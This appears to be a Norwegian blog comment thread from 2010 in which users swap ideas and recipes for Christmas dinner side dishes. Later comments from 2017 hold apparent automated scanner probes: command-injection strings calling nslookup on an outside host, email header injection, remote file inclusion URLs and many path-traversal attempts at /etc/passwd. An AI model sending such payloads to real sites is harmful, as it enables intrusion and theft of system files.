Des 19

Julemiddag og tilbehør?

542 kommentarer 2010 kl. 18:45 skrevet av MissPinky

Sitter her og skriver handleliste, jeg som trodde jeg var ferdig... Men det er utrolig hvor mye godt man "må" ha til jul! Jeg bare MÅ ha mer juleøl og så vil jeg lage god gammeldags aspic. Ja og så kremfløte til multebærene...

 

Anyroad, det jeg plundrer med er julemiddagene. Her i huset blir det juleribbe på julaften, med Aass Juleøl, kokte poteter og stekeskyen og ....WHAT?

 

Hva søren er godt å ha til ribba når man ikke liker surkål? Det føles liksom litt uhøytidelig å spise bare poteter og sky til, er det julaften så skarre jo værra fiiint!

 

Noen tips, anyone? 

 

Photobucket   Photobucket 

 

Og hva spiser den frodige forsamling på sjølvaste julaften? Torsk? Sild? Pinnekjøtt av lam eller svin, røkt eller ei? Grandis? And? Varm eller kald kun?

 

Og hva har dere som tilbehør til dette??

Permanent lenke

Kommentarer:

  1. erling155 18:52 19/12/10
    spagetti
  2. MissPinky MissPinky 18:53 19/12/10
    hardkokt?
  3. erling155 18:56 19/12/10
    ja kok'n hard du pinky,

    ellers så kan jo svisker og aprikoser (tørkede) legg de inn i ovnen en 1/2 tid før ribba er ferdig.

  4. SmackThatPony 18:56 19/12/10
    I år aner jeg ikke hva som står på menyen!

    Men har stort sett spist pinnekjøtt av får -urøkt, med kokte poteter og kålrabistappe.
    Jeg må tilstå at det ikke smaker meg som det pleide. Har jeg forandret smak, er ikke smaken som før eller er det sånn at jeg idealiserer smaken litt i minnet?

    Bruker ikke mange rosenkål til svineribba? Det er vel noe med å ha noe til som veier opp for fettet. Som akevitten gjør... :-)
  5. Baldy 19:01 19/12/10
    Hva med å ha litt erter eller ertestuing, rørte tyttebær, litt grov sennep, babygulerøtter og brokkoli? medisterkaker og pølse hører vel også med :-)
  6. erling155 19:05 19/12/10
    makaroni
  7. irene49 19:10 19/12/10
    Hos meg blir det ribbe,medisterkaker/pølser,poteter,surkål,saus og lefse...Riskrem med mandel i til dessert..Juleøl og akevitt..Likør til desserten med kaffe til..Altfor mye godt på en dag, men gleder meg til maten..
    Jeg er glad i hjemlaget surkål...Går vel ann med en pose frosne grønnsaker til, istedet for surkål..
  8. MissPinky MissPinky 19:17 19/12/10
    jeg er flink til å hardkoke, skal jeg bare si deg, herr skinnfe

    Svisker og aprikos...klissete...
    Rosenkål...nja det er jo litt stilig, men er det godt?
    Medisterkaker og medisterpølser blir det vaffal ikke, ribba er da feit nok alene.
    Ertestuing? *prrromp* erter...mulig.

    Av en eller annen grunn tenker jeg på honningglaserte babygulerøtter og rosenkål, men det blir vel søtt.

    Jeg blir sprø!
  9. SmackThatPony 19:19 19/12/10
    Jeg har aldri prøvd det i denne sammenhengen, men honningglaserte gulrøtter satte meg på tanken; Hvitløksgulrøtter? Wok dem i olje med finhakket hvitløk.
  10. Libben 19:21 19/12/10
    Sylteagurker, rødbeter, syrlige epler. Noe syrlig og søtt for å balansere det hele ut litt. Kanskje være spennende og ha litt ripsgele eller noe sånt til.
  11. MissPinky MissPinky 19:22 19/12/10
    ribbe og hvitløk? Blir det ikke litt "jula varer helt til påske"? :p
  12. SmackThatPony 19:24 19/12/10
    hehe Jo, når jeg sitter her og prøver å forestille meg det får jeg det ikke til å stemme... Blir rett og slett Usj!

    Som LIbben sier er det å finne noe som balanserer det litt.
  13. MissPinky MissPinky 19:24 19/12/10
    ripsgele er jo deilig, og tyttebær.... tatziki og guacamole kanskje, friskt
  14. Libben 19:25 19/12/10
    Forøvrig blir det svineribbe, medisterkaker, sosisser, poteter, saus med ribbefettet i, surkål, rødkål, øl og aquavit. Same procedure as... the years I didn't have pinnekjøtt, dampepølse (egen pølsevariant fra Nordford), kålrabitappe, surkål, poteter og fåreribbefett...
  15. lips lips 19:28 19/12/10
    Jeg går for bursdags-libben sitt forslag! Hørtes godt ut.. :)
    Blir ribbe til julemiddagen, men jeg gleder meg egentlig mest til 1.juledagsfrokost.. Kald ribbe, lefse, sylte og rull, laks og eggerøre, rakfisk (som jeg ikke liker, men det hører jo med..hehe..) sursild, øl og aquvavit.. og riskrem med rød saus til dessert.. :))
  16. SmackThatPony 19:31 19/12/10
    Leste et forslag på nettet om chilimarinert ananas!
    Det gir jo litt futt og det søt-syrlige
  17. Libben 19:31 19/12/10
    Sånn første juledagsfrokost har vi og. Med en liten egen familievariant. All julematen pakkes inn i en lefse. Avdøde bestefar sin oppfinnelse. Lefseklining kaller vi det. Forøvrig finnes omtrent alt som kan spises på frokostbordet.
  18. MissPinky MissPinky 19:34 19/12/10
    nei Libben da, det skal IKKE være saus på ribba, men stekeskyen! Basta og gratulerer med dagen!

    chilimarinert ananas tror jeg at jeg sparer til grillmaten. :p

    Heter det sky eller sjy, forresten?
  19. Libben 19:35 19/12/10
    Hva med å krydre ribba litt spennede med julekryddere? Nellik og litt kanel (i stangform og ikke pulver) ha i vannet sånn at det damper ribba. Da lukter det jul og så blir det en ny smak. Og så slenger man inn rognebærgele som det syrlige. Tzatsiki og lign. blir base og siden ribba og ribbefettet alt er det så blir det nok litt kjedlig i smak.
  20. MissPinky MissPinky 19:35 19/12/10
    hva slags lefse bruker dere til julefrokosten? Ikke Berthas tykklefse regner jeg med?
  21. Libben 19:35 19/12/10
    Sjy.
  22. MissPinky MissPinky 19:36 19/12/10
    nei man føkker ikke med Pinkys ribbe, den skal smake som den alltid har gjort.
  23. Libben 19:39 19/12/10
    Hjemmelagde potetlefser. Hilsen mora til eksen min. Sånn er det når eksen og en selv bodde og hadde familie i samme lille vestlandsbygd :-D
  24. MissPinky MissPinky 19:45 19/12/10
    kald ribbe med laks og lompe, liksom? God frokost, hehe. :p
    Er ikke vant til å bruke potetkaka til annet enn pølse eller brunost, men jeg ser at den godt kan brukes til et 1.juledagsfrokostkoldtbord, skal prøve det! *noterer lompe på handlelista*
  25. lips lips 19:56 19/12/10
    Lefser må til ja! Ellers er jeg enig med frk. rosa.. man kødder ikke med juleribba!
  26. Libben 20:02 19/12/10
    Enig i det med juleribba. Bare foreslo litt. Den halvferdige kokkeutdannelsen merkes i blant... Forøvrig er høydepunktet hos oss de hjemmelagde medisterkakene med svært lite medisterdeig i farsen og den gode sausen vi kun får en gang i året.
  27. Chayyah 20:21 19/12/10
    Rosenkål hører med. Og ordentlig brun saus. Sjy er for pingler! :o)
    I tillegg kan man ha sosisser, medisterkaker eller julepølser.
  28. kaninen 20:22 19/12/10
    Ja,,hva spiser jeg julaften? Hadde jeg kunnet velge hadde det blitt inderfielt ku,,rosa stekt servert me fløøtesus,og bakt potet med hvitløk smør. Slylt det hele ned med ett par flasker rødvin.
    Men nå har det seg slik at jeg skal bort til noen som ikke har skjønt at krigen var over i 45. De serverer restemat som ribbe og medister. Ser man bort fra innholdet er julepølser spiselige,,,men ikke festmat i mine øyne.
  29. Carter 20:24 19/12/10
    Surkål må til skal man ha ribbe.
    Og Erling; den spagettien eller makaronien får du klare deg uten skal du feire jul med meg!
  30. MissPinky MissPinky 20:29 19/12/10
    NEI, IKKE brunsaus, og ikke surkål! Ødelegge sjyen sånn da, det beste med hele juleribba er jo den rene stekesjyen over poteter og kjøtt...mmmh
  31. Chayyah 20:32 19/12/10
    Joo, ordentlig brun saus, kokt med appelsin oppi, litt løk, litt fløte mot slutten. Og siler det hele når det er ferdig kokt. SÅ tilsetter du sjyen. Nammi!
  32. Libben 20:32 19/12/10
    Siste adventslyset tent. The rat pack synger julesanger og her sitter man og savner de som ikke er og kan kose seg i jula med oss lenger. Julemelankolien kom tidligere enn vanlig dette året...
  33. Carter 20:33 19/12/10
    Enig med deg der Pinky, IKKE brun saus på ribba, kun sjyen etter stekingen, men surkålen må være med. Huff, nå ble jeg sulten, men nå er det bare 5 dager til den store kvelden... :o))
  34. Carter 20:34 19/12/10
    Jeg tror du skal ha kalkun jeg Chayyah, da serverer man gjerne apelsinsaus.
  35. Empress 20:39 19/12/10
    Juleaften har vi sildebord kl 12:00 (Svensk), og til middag har vi stuffed (eh... fyllt!) kalkun og plumpudding med brandy butter! (Engelsk) MMmmm!

    Hvis jeg skal servere Norsk julemat, ville jeg nok hatt ribbe, medisterkaker og julepølser med skikkelig brun saus med brunost og ribbefett i, rosenkål, surkål eller rødkål, svisker og tyttebær, og pynte med litt epler
  36. irene49 20:41 19/12/10
    Ja Libben da er vi to...
  37. Bamse42 20:56 19/12/10
    BLE SULTEN NÅ....................... GOOOOOOD MAT. NAMMI
  38. erling155 21:29 19/12/10
    ok da :-)

  39. Silfen Silfen 21:39 19/12/10
    Liker du rødkål da? Sånn uten å ha lest tråden er det mitt forslag.

    Vi skal ha pinnekjøtt, kålrabistappe, rødkål og poteter for syns skyld. Dessert er ukjent ennå. Jeg har ikke fryser ellers så hadde det blitt is. Eller er værutsiktene kjølige så blir det is likevel, hehe.

    Her er forøvrig noen av julesnacksene jeg laget i dag (fremgangsmåte på alle finnes på detsoteliv.no):

    Bountykuler:

    50 g smør
    0.5 dl lys sirup
    0.5 dl lys sirup
    2 dl kremfløte
    200 g kokos

    200 g lys sjokolade (jeg måtte ha 300)

    Crispy crackolates:

    90 g smør
    3 ss lys sirup
    3 ss kakao
    3 ss melis

    cornflakes


    Disse to her ble helt himmelske. Hadde venner på besøk tidligere som ble servert disse og det var nytelse for alle.

    Jeg lagde en til med cornflakes; Sjokoladeflakes:

    200 g kokesjokolade
    50 g delfiafett
    cornflakes

    Disse var også gode, crispy og litt saltaktige. Hadde sikkert vært godt med litt havsalt i oppskriften. Nesten som Smash da.

    Til slutt laget Iben havrekuler. Små kakeballer med smør, havregryn, kakao, vaniljesukker, kaffe, sukker og deretter rullet i melis. Fine å lage for smårollinger.

  40. anka 21:57 19/12/10
    Surkål,rødkål,ertstuing, tyttebærsyltetøy, grov sennep og brokkoliblanding, har alltid vært tilbehøret til julemiddagen her i huset....her tilfredstilles alles ønsker.
    Men i år så blir det ikke flere enn tre tilbords...så da blir det bare rødkål, tyttebær,grov sennep og brokkoliblandinga fra Findus ( minstemann elsker den blandinga) :-)
  41. unsen unsen 22:13 19/12/10
    her vert det pinnekjøtt av sau ( og gris ) .. mmmmm med kålrabistapp,poteter , julepølse rødkål/surkål, ribbefett :-))
    til dessert vert det skikkelig heimelaga riskrem ,- og sviske/rosin dessert. noe pappa er oppvaksenmed på julafta :-)


    til fersk ribbe- i ovn.. har eg og gulrøtter - kålrabistappe, rødkål til :-))
  42. Kotlett Kotlett 22:15 19/12/10
    Jeg er fan av rødkål. Fikser ikke karve under noen omstendigheter, hverken vått eller tørt!
  43. Silfen Silfen 22:16 19/12/10
    Saus til ribbe. Her banner jeg i kjerka og bruker Toro. Men det er så seriøst godt. Jeg tar og surrer rødløk, bacon i småbiter og sopp. Fordi jeg elsker sopp. Så har jeg i fløtesaus og bernaise. Masse kremfløte og vann og gjerne litt cremé fraiche. Godt med salt og andre krydderier man liker.

    Det blir så digg. :drools: Nesten så man bare kan spise saus. Yum, yum.
  44. Scilla 22:33 19/12/10
    Eeeeeewwwwwwwwwwwwwww............!!!!!!!!!!!!!!!!


    HERREGUD!!!!! Dette er jo ENDA mer DISGUSTING enn cyste bloggen............

    Fløtesaus, bearneise, CF og kremfløte på RIBBE - i EN jævla SUPPE??????

    Tror jeg kaster opp snart........... YUCK!!!!!!!!

    Lord, help me........
  45. Silfen Silfen 22:40 19/12/10
    Så hyggelig at du ga lyd fra deg så jeg fikk enda en på blokkeringslisten. :)
  46. MissPinky MissPinky 22:55 19/12/10
    hvordan kom du fram til den blandingssausen?? Prøver den gjerne til karbiser el noe, men stekesjyen til juleribba er HELLIG!

    Jeg liker ikke noen slags sure grønnsaker, enten det er surkål eller rødkål eller sylteagurk. Mulig jeg varmer litt for juleluktas del, men spist blir det ikke. Fikk tips om legge epler sammen med ribba den siste halvtimen, vurderer det... Eller så blir det bare litt salat med tomater og noe crispy.

    Tror jeg må kjøpe cornfløakes, de godisene så fristende ut... :o)
  47. Silfen Silfen 23:04 19/12/10
    Bestemoren min lager de beste sausene og jeg fikk jo sjokk da jeg i ungdomsåra fant ut at det var Toro all the way. Så har jeg miksmakset på egenhånd. Veldig godt med både løk og bacon i saus da. Jeg har jo ikke noe forhold til juleribbe, så jeg liker gode, feite sauser til den type kjøtt.
  48. Graven76 Graven76 23:23 19/12/10
    Julekveldsmaten er tradisjonsrik og litt "hellig" for min del.

    Først er det fersk suppe med kål, gulrot, sellerirot og purreløk. Kokes på ribba og eventuelt ryggehøgg som det heter i nulldalen.

    Så er det ribbe med sprø svor, ribbesjy, hjemmelagede grove medisterpølser, Hjemmelagede innmatpølser, hjemmelaget surkål, hjemmelaget rødkål, og kokte poteter. Ribba og pølsene er selvfølgelig fra hjemmeavlet og hjemmeslaktet gris. og potetene er som seg hør og bør hjemmeavlet de og.

    Til dessert avslutter vi med hjemmelaget karamellpudding og karamellsaus samt riskrem med rød saus for den som foretrekker det.

    Akkurat når det kommer til julematen er jeg bortskjemt og holder meg langt unna de ferdigproduserte varene fra Gilde osv. De har jeg servert nok av på jobb i løpet av November/Desember ( ble vel ca 900 kg ribbe i år også)

    Og til de som synes det er sært og rart med suppe på julekvelden så er det nok det aller andre steder enn i nulldalen. Men her er det en gammel tradisjon som noen fortsatt holder i hevd :-)
  49. cala 23:26 19/12/10
    Hvorfor ikke prøve rosenkål med balsamicosautert sjalottløk ved siden av?? Blir litt søtt,salt og syrlig..... Og med en dæsj ripsgele istedet for tyttebæra- vips så har du en ny variant av juleribba.....

    Her i huset blir det svinesteik, ribbe, pølser og medister med hjemmelaget surkål og saus.Og mandelpotet såklart... Sennep, tyttebær og sylteagurk ved siden... Øl og akk i glassene...
    Riskrem og pære belle helene til dessert....

    Sånn blir det når man mikser juletradisjoner fra alle grener av familien....

    Mye og feilt mat- men akk så deilig denne spesielle kvelden i året.....

    God jul alle :o)
  50. Bjarthe 00:42 20/12/10
    Gi dere nå, - jeg blir sulten ...
  51. Chayyah 00:55 20/12/10
    Rosenkål og brun saus. Nammi!
  52. Johanna Johanna 00:55 20/12/10
    kommer litt an på hvor mange pers. dere blir ,, men dette er oppskrift på noe som jeg kaller for ''mumma'' ... jeg spiser nå for tiden gjerne både rødkål og surkål for enkelhetens skyld... men kom på dette tilbehøret når jeg leste om bacon lenger opp...

    oppskrift på mumma for 7 pers.

    1/2 rød hodekål (1/2 kg)
    1 gul løk
    2 syrlige epler
    smør
    75 gr bacon
    1/2 dl balsamico
    1 dl stekesjy ,, for å få til 1 dl kan man jo blande litt fond og sånn oppi...
    1/2 dl starkvinsgløgg
    kryddpepper og kryddnelliker
    salt
    1,5 spises. sukker

    Kål, løk og epler strimles
    ''Fräs'' bacon i stekepanne eller stekegryte, ikke for liten... Ha oppi strimlene (kål, løk og epler)
    Blande i nelliker, pepper, sjy / fond, balsamico og gløgg og småkok under lokk cirka en halv time. Rør i gryten litt nå og da.

    Salt og sukker etter smak og behag, kanskje det jeg har skrevet ikke er nok eller så kan det være for mye :-)
  53. vargjen 08:50 20/12/10
    Røykt pidnakjøt frå sau som har tusla rundt på fjedlet over Teigdalen (Evanger) og blitt feite. Med kokte kerrspink-pote, kålrabistappa og dampa sjy.
    Karamellpudding og moltekrem til dessert (:
  54. vargjen 08:51 20/12/10
    Røykt pidnakjøt frå sau som har tusla rundt på fjedlet over Teigdalen (Evanger) og blitt feite. Med kokte kerrspink-pote, kålrabistappa og dampa sjy.
    Karamellpudding og moltekrem til dessert (:
  55. MissPinky MissPinky 11:36 20/12/10
    jeg kimser ikke av Toro, han er fast gjest her i huset.

    suppe på julaften virker noe sært ja, er vel en tradisjon fra den tida overfloden ikke var så overflodig? En respektabel tradisjon å ha med seg det.

    balsamicosautert sjalottløk hørtes digg ut, har du oppskrift?

    mumma hørtes jo ut som mums for mams, sjikkeli julete alternativ til surkål også. Det tror jeg faktisk må prøves. Men ikke med den hellige stekesjyen nei, det må bli med fond... :o)
  56. Carter 20:02 20/12/10
    Kos deg med pinnekjøttet ditt Vargjen, selv får jeg ikke ned den minste lille bit. Det smaker rett og slett våt saueull av det. Alt som har med sau og gjøre er helt forferdelig!

    Egentlig liker jeg ikke ribbe heller, annet enn på julaften!
    Men derimot rakfisk og lutefisk - nydelig!

    God jul til dere alle, hva dere nå enn måtte kose dere med på julaften. :o))
  57. Blomst Blomst 10:04 21/12/10
    Er fra en gammel gård med enda eldre tradisjoner. Dagen begynner med mølje kl 12.00. Så skal ølet smakes på og godkjennes. Før ribba, medisterkakene, pølsene, surkål/rødkål og poteter skal på bordet, skal de døde besøkes på kirkegården, husker vi dro dit til hest og vogn, det blir ikke gjort lengre. Julen ringes inn i klokka 17.00 i gårdsklokka, og to skudd med kragen blir avfyrt før dyrene får god mat og familien setter seg til bords..
  58. Libben 21:57 21/12/10
    Eneste grunnen til at toro av og til viser det gjærekstrakt befengte trynet sitt her i hus er dovenskap... Såkalte smaksforsterkere gjør at det smaker høgg... Men hjemmelaget bearnaise er et helsike å lage...
  59. MissPinky MissPinky 16:15 22/12/10
    aah, jeg måtte prøvesmake potetlefse med salt pålegg og det var så diggetidigg at jeg måtte ut å kjøpe mer! :o)

    pffft, jeg er glad jeg ikke har så fine smaksløker at jeg kjenner høggsmak av Toro og Knorr. Men det er jo gøy å lage ting fra bunnen da. :o)

    hmmm.... lurer på om jeg skal skaffe meg gårdsklokke...
  60. Silfen Silfen 16:17 22/12/10
    Merkeligere er det nå at folk spiser ting som smaker høgg ...
  61. Libben 16:22 22/12/10
    Av og til smaker maten godt og er tilberedt etter alle kunstens regler. Andre ganger er det kun påfyll av energi.
  62. Silfen Silfen 16:23 22/12/10
    Igjen; merkelig at folk putter i seg ting de ikke liker. Det kan umulig være en god tankegang. Men, skruller er det overalt.
  63. Libben 16:24 22/12/10
    Folk åt smakløs graut i århundrer. Skrullene er de som grubler for mye over det andre gjør...
  64. Scilla 19:30 22/12/10
    Oi, skal det så lite til for å bli blokkert av Silfen?

    Har bare hørt at du gir de fleste andre en fot i kjeften eller ræva når det passer deg, "fordi det skapte en ""interessant"" debatt!".... Hadde nå trodd at du i det minste tålte at noen var uenige med deg...... Men at du er så nærtagende selv at du tar det personlig at noen synes det DU koser deg med i advents- og juletiden er motbydelig, ER en interessant observasjon i denne sammenhengen......

    Ja, ja.......... Jula ER vanskelig å komme i gjennom for enkelte........

    Lykke til, Silfen..... og God Jul, kanskje? Who knows......

  65. Silfen Silfen 19:33 22/12/10
    Libben; hva vet du om grøten var smakløs? Det finnes ganske mange naturlige smakstilsettere ute i skauen.

    Forøvrig så kan du vel umulig mene å skulle sammenligne et samfunn uten de valgmulighetene vi har i dag, med oss, når det gjelder mat?
  66. emptywish emptywish 19:38 22/12/10
    Vi ska? ha rypebryst med butterdeig poteter, pappas vilt saus, tyttebær og grønnsaker.. Yam yam! Gleder mæ vilt!!!
  67. Scilla 20:53 22/12/10
    Her blir det Cross-Over fra Finland-Sverige-Norge-Danmark.... Det beste av alle fire på en dag i form av å forsyne seg litt av alt..... :)

    HELT fantastisk..... :)
  68. Libben 00:26 23/12/10
    Da som nå er amt av og til påfyll av energi. Man er sliten og trøtt og magen skriker. Da eter man. Om det så er gråstein med ketchup på.
  69. Johanna Johanna 02:22 23/12/10
    Hvem er du Scilla ,, eller hvordan man nå spør :-) når man er nysgjerrig som meg......? Jeg regner med at dere skal spise ''kålrotslåda'' (finsk) ''julskinka'' (svensk) ''røde pølser'' (dansk) ... Er så mye annet som er godt ,, jeg kjenner jo nesten bare til svensk julmat ,, men finsk ''kålrotslåda'' er fantastisk god og vi hadde det hjemme før i tiden...
    Kos deg og ha en fantastisk gastronomisk god jul !!!
  70. MissPinky MissPinky 15:11 24/12/10
    takk for stjernetips til tilbehør, Johanna, mummaen er klar og sjikkelig digg! Photobucket
  71. 1 1 22:57 11/09/17
  72. 1 1 17:37 12/09/17
  73. 1 1 17:37 12/09/17
  74. 1 1 17:37 12/09/17
  75. 1 1 17:37 12/09/17
  76. 1 1 17:37 12/09/17
  77. 1 1 17:37 12/09/17
  78. 1 1 17:37 12/09/17
  79. 1 1 17:37 12/09/17
  80. 1 1 17:38 12/09/17
    response.write(9233018*9334028)
  81. 1 1 17:38 12/09/17
    '+response.write(9233018*9334028)+'
  82. 1 1 17:38 12/09/17
    '+response.write(9233018*9334028)+'
  83. 1 1 17:38 12/09/17
    "+response.write(9233018*9334028)+"
  84. 1 1 17:38 12/09/17
  85. 1 1 17:39 12/09/17
  86. 1 1 17:39 12/09/17
  87. 1 1 17:39 12/09/17
  88. 1 1 17:39 12/09/17
  89. 1 1 17:39 12/09/17
  90. 1 1 17:39 12/09/17
  91. 1 1 17:40 12/09/17
  92. 1 1 17:40 12/09/17
  93. 1 1 17:40 12/09/17
  94. 1 1 17:40 12/09/17
  95. 1 1 17:40 12/09/17
  96. 1 1 17:40 12/09/17
  97. 1 1 17:40 12/09/17
  98. 1 1 17:40 12/09/17
  99. 1 1 17:40 12/09/17
  100. 1 1 17:40 12/09/17
    '>">
  101. 1 1 17:40 12/09/17
  102. 1 1 17:40 12/09/17
  103. 1 1 17:40 12/09/17
  104. 1 1 17:41 12/09/17
  105. 1 1 17:41 12/09/17
  106. 1 1 17:41 12/09/17
    set|set&set
  107. 1 1 17:41 12/09/17
  108. 1 1 17:41 12/09/17
    $(nslookup dns.ce.\018373.74-8385.74.9405d.\1.bxss.me)
  109. 1 1 17:41 12/09/17
    &nslookup dns.ce.\018373.74-8386.74.9405d.\1.bxss.me&'\"`0&nslookup dns.ce.\018373.74-8386.74.9405d.\1.bxss.me&`'
  110. 1 1 17:41 12/09/17
  111. 1 1 17:41 12/09/17
    yuzs0Fw8
  112. 1 1 17:41 12/09/17
  113. 1 1 17:41 12/09/17
  114. 1 1 17:41 12/09/17
  115. 1 1 17:41 12/09/17
  116. 1 1 17:41 12/09/17
  117. 1 1 17:42 12/09/17
  118. 1 1 17:42 12/09/17
  119. 1 1 17:42 12/09/17
  120. 1 1 17:43 12/09/17
  121. 1 1 17:43 12/09/17
  122. 1 1 17:43 12/09/17
  123. 1 1 17:43 12/09/17

    bcc:018373.74-8403.74.9405d.1@bxss.me
  124. 1 1 17:43 12/09/17
    to@example.com>
    bcc:018373.74-8404.74.9405d.1@bxss.me
  125. 1 1 17:43 12/09/17
  126. 1 1 17:43 12/09/17
  127. 1 1 17:43 12/09/17
  128. 1 1 17:44 12/09/17
  129. 1 1 17:44 12/09/17
  130. 1 1 17:44 12/09/17
  131. 1 1 17:44 12/09/17
  132. 1 1 17:44 12/09/17
  133. 1 1 17:44 12/09/17
  134. 1 1 17:44 12/09/17
  135. 1 1 17:44 12/09/17
  136. 1 1 17:44 12/09/17
  137. 1 1 17:44 12/09/17
  138. 1 1 17:45 12/09/17
  139. 1 1 17:45 12/09/17
  140. 1 1 17:45 12/09/17
  141. 1 1 17:45 12/09/17
  142. 1 1 17:45 12/09/17
  143. 1 1 17:45 12/09/17
  144. 1 1 17:45 12/09/17
  145. 1 1 17:45 12/09/17
  146. 1 17:45 12/09/17
  147. 1 1 17:45 12/09/17
  148. 1 1 17:46 12/09/17
  149. 1 1 17:46 12/09/17
  150. 1 1 17:46 12/09/17
  151. 1 1 17:46 12/09/17
  152. 1 1 17:46 12/09/17
  153. 1 1 17:46 12/09/17
    12345'"\'\");|]*{
    ?''?
  154. 1 1 17:46 12/09/17
  155. 1 1 17:46 12/09/17
  156. 1 1 17:46 12/09/17
  157. 1 1 17:46 12/09/17
  158. 1 1 17:46 12/09/17
  159. 1 1 17:46 12/09/17
  160. 1 1 17:46 12/09/17
  161. 1 1 17:46 12/09/17
  162. 1 1 17:46 12/09/17
  163. 1 1 17:47 12/09/17
  164. 1 1 17:47 12/09/17
  165. 1 1 17:47 12/09/17
  166. 1 1 17:47 12/09/17
  167. 1 1 17:47 12/09/17
  168. 1 1 17:47 12/09/17
  169. 1 1 17:47 12/09/17
  170. 1 1 17:47 12/09/17
  171. 1 1 17:47 12/09/17
  172. 1 1 17:47 12/09/17
  173. 1 1 17:47 12/09/17
    ${9999267+9999768}
  174. 1 1 17:47 12/09/17
  175. 1 1 17:47 12/09/17
  176. 1 1 17:47 12/09/17
  177. 1 1 17:47 12/09/17
  178. 1 1 17:47 12/09/17
  179. 1 1 17:47 12/09/17
  180. 1 1 17:47 12/09/17
  181. 1 1 17:47 12/09/17
  182. 1 1 17:48 12/09/17
  183. 1 1 17:48 12/09/17
  184. 1 1 17:48 12/09/17
  185. 1 1 17:48 12/09/17
  186. 1 1 17:48 12/09/17
  187. 1 1 17:48 12/09/17
  188. 1 1 17:48 12/09/17
  189. 1 1 17:48 12/09/17
  190. 1 1 17:48 12/09/17
  191. 1 1 17:48 12/09/17
  192. 1 1 17:48 12/09/17
  193. 1 1 17:48 12/09/17
  194. 1 1 17:48 12/09/17
  195. 1 1 17:49 12/09/17
  196. 1 1 17:49 12/09/17
  197. 1 1 17:49 12/09/17
  198. 1 1 17:49 12/09/17
  199. 1 1 17:49 12/09/17
  200. 1 1 17:49 12/09/17
  201. 1 1 17:49 12/09/17
  202. 1 1 17:49 12/09/17
  203. 1 1 17:49 12/09/17
  204. 1 1 17:49 12/09/17
  205. 1 1 17:49 12/09/17
  206. 1 1 17:49 12/09/17
  207. 1 1 17:50 12/09/17
  208. 1 1 17:50 12/09/17
  209. 1 1 17:50 12/09/17
  210. 1 1 17:50 12/09/17
  211. 1 1 17:50 12/09/17
  212. 1 1 17:50 12/09/17
  213. 1 1 17:51 12/09/17
    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  214. 1 1 17:51 12/09/17
    1some_inexistent_file_with_long_name.jpg
  215. 1 1 17:51 12/09/17
    Http://testasp.vulnweb.com/t/fit.txt
  216. 1 1 17:51 12/09/17
    http://testasp.vulnweb.com/t/fit.txt?.jpg
  217. 1 1 17:51 12/09/17
    testasp.vulnweb.com
  218. 1 1 17:51 12/09/17
  219. 1 1 17:51 12/09/17
  220. 1 1 17:52 12/09/17
  221. 1 1 17:52 12/09/17
  222. 1 1 17:52 12/09/17
  223. 1 1 17:52 12/09/17
  224. 1 1 17:52 12/09/17
  225. 1 1 17:52 12/09/17
  226. 1 1 17:52 12/09/17
  227. 1 1 17:52 12/09/17
  228. 1 1 17:52 12/09/17
  229. 1 1 17:53 12/09/17
  230. 1 1 17:53 12/09/17
  231. 1 1 17:53 12/09/17
    &n990912=v939733
  232. 1 1 17:53 12/09/17
  233. 1 1 17:53 12/09/17
  234. 1 1 17:53 12/09/17
  235. 1 1 17:53 12/09/17
  236. 1 1 17:53 12/09/17
  237. 1 1 17:54 12/09/17
  238. 1 1 17:54 12/09/17
  239. 1 1 17:54 12/09/17
  240. 1 1 17:54 12/09/17
  241. 1 1 17:54 12/09/17
  242. 1 1 17:54 12/09/17
  243. 1 1 17:54 12/09/17
  244. 1 1 17:54 12/09/17
  245. 1 1 17:54 12/09/17
  246. 1 1 17:55 12/09/17
  247. 1 1 17:55 12/09/17
  248. 1 1 17:55 12/09/17
  249. 1 1 17:55 12/09/17
  250. 1 1 17:55 12/09/17
  251. 1 1 17:55 12/09/17
  252. 1 1 17:55 12/09/17
  253. 1 1 17:55 12/09/17
  254. 1 1 17:55 12/09/17
  255. 1 1 17:55 12/09/17
  256. 1 1 17:55 12/09/17
  257. 1 1 17:55 12/09/17
  258. 1 1 17:55 12/09/17
  259. 1 1 17:55 12/09/17
    ../../../../../../../../../../etc/passwd
  260. 1 1 17:55 12/09/17
  261. 1 1 17:55 12/09/17
    ../../../../../../../../../../../../../../../proc/version
  262. 1 1 17:56 12/09/17
  263. 1 1 17:56 12/09/17
  264. 1 1 17:56 12/09/17
    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  265. 1 1 17:56 12/09/17
  266. 1 1 17:56 12/09/17
    ../../../../../../../../../../etc/passwd.jpg
  267. 1 1 17:56 12/09/17
  268. 1 1 17:56 12/09/17
    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  269. 1 1 17:56 12/09/17
    /../..//../..//../..//../..//../..//etc/passwd.jpg
  270. 1 1 17:56 12/09/17
  271. 1 1 17:56 12/09/17
    )
  272. 1 1 17:56 12/09/17
    !(()&&!|*|*|
  273. 1 1 17:56 12/09/17
  274. 1 1 17:56 12/09/17
    .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  275. 1 1 17:56 12/09/17
    ^(#$!@#$)(()))******
  276. 1 1 17:56 12/09/17
    /etc/passwd
  277. 1 1 17:56 12/09/17
  278. 1 1 17:56 12/09/17
  279. 1 1 17:56 12/09/17
    %2fetc%2fpasswd
  280. 1 1 17:56 12/09/17
  281. 1 1 17:56 12/09/17
  282. 1 1 17:57 12/09/17
    /.././.././.././.././.././.././.././../etc/./passwd%00
  283. 1 1 17:57 12/09/17
    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  284. 1 1 17:57 12/09/17
    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  285. 1 1 17:57 12/09/17
    ..??..??..??..??..??..??..??..??etc/passwd
  286. 1 1 17:57 12/09/17
  287. 1 1 17:57 12/09/17
  288. 1 1 17:57 12/09/17
  289. 1 1 17:57 12/09/17
    invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././